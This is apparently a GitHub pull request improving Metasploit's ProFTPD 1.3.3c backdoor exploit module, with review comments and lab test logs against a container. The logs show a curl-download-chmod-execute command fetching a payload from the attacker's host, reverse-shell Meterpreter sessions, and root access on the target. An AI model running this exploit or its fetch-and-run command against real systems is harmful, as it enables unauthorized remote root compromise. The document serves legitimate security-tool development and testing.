proftpd_133c_backdoor: Various improvements#21381
Merged
Merged
Conversation
bd308de to
53e084a
Compare
be9061b to
60e8337
Compare
Contributor
Author
|
This now needs #21380 to be merged ahead of time. |
d643d4d to
1407401
Compare
1407401 to
0ef5bf2
Compare
Contributor
Author
|
Thanks for the taking the time to review and feedback @msutovsky-r7. |
e295986 to
5c04837
Compare
1c2ea2f to
738aa32
Compare
Contributor
Author
738aa32 to
dd1c4bd
Compare
jheysel-r7
reviewed
Jun 9, 2026
jheysel-r7
left a comment
Contributor
There was a problem hiding this comment.
Thanks for the PR @g0tmi1k. Looks good - a couple minor changes requested and I'll get this landed 👍
Testing
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rport 2121
rport => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Started reverse TCP handler on 192.168.3.8:4444
[*] 127.0.0.1:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. No response to backdoor command, so server may have dropped into shell mode
[*] 127.0.0.1:2121 - Sending FTP command to trigger backdoor
[*] 127.0.0.1:2121 - Payload sent - awaiting callback
[*] Meterpreter session 1 opened (192.168.3.8:4444 -> 192.168.3.8:53234) at 2026-06-09 12:11:31 -0700
meterpreter > getuid
Server username: root
smeterpreter > sysinfo
Computer : f381d943475a
OS : Debian 13.4 (Linux 6.12.76-linuxkit)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > bg
[*] Backgrounding session 1...
dd1c4bd to
ceaac36
Compare
Contributor
Author
|
Hey @jheysel-r7 - thanks for taking the time to review this. $ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;
use exploit/unix/ftp/proftpd_133c_backdoor;
set RPORT 2121;'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 127.0.0.1
LHOST => docker0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Command to run on remote host: curl -so ./yCvcnxED http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./yCvcnxED;./yCvcnxED&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c Server (ProFTPD Docker Installation)
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. No response to backdoor command, so server may have dropped into shell mode
[*] 127.0.0.1:2121 - Connecting to FTP server...
[*] 127.0.0.1:2121 - Connected to target FTP server
[*] 127.0.0.1:2121 - FTP Banner: ProFTPD 1.3.3c Server (ProFTPD Docker Installation)
[*] 127.0.0.1:2121 - Sending FTP command to trigger backdoor
[*] 127.0.0.1:2121 - Running: nohup curl -so ./yCvcnxED http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./yCvcnxED;./yCvcnxED& >/dev/null 2>&1
[*] 127.0.0.1:2121 - Payload sent - awaiting callback
[*] Client 172.17.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.17.0.2 (curl/8.14.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:37986) at 2026-06-15 13:44:28 +0100
meterpreter > sysinfo
Computer : XXX
OS : Debian 13.4 (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > |
jheysel-r7
approved these changes
Jun 19, 2026
Contributor
Release NotesThis adds a number of improvement to the proftpd_133c_backdoor module. It adds a check method, updates module metadata and improves the verbosity of logging. |
Contributor
Author
|
Cheers @jheysel-r7 ! |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR is to:
check()functionTarget is a container.
Setup
Before
After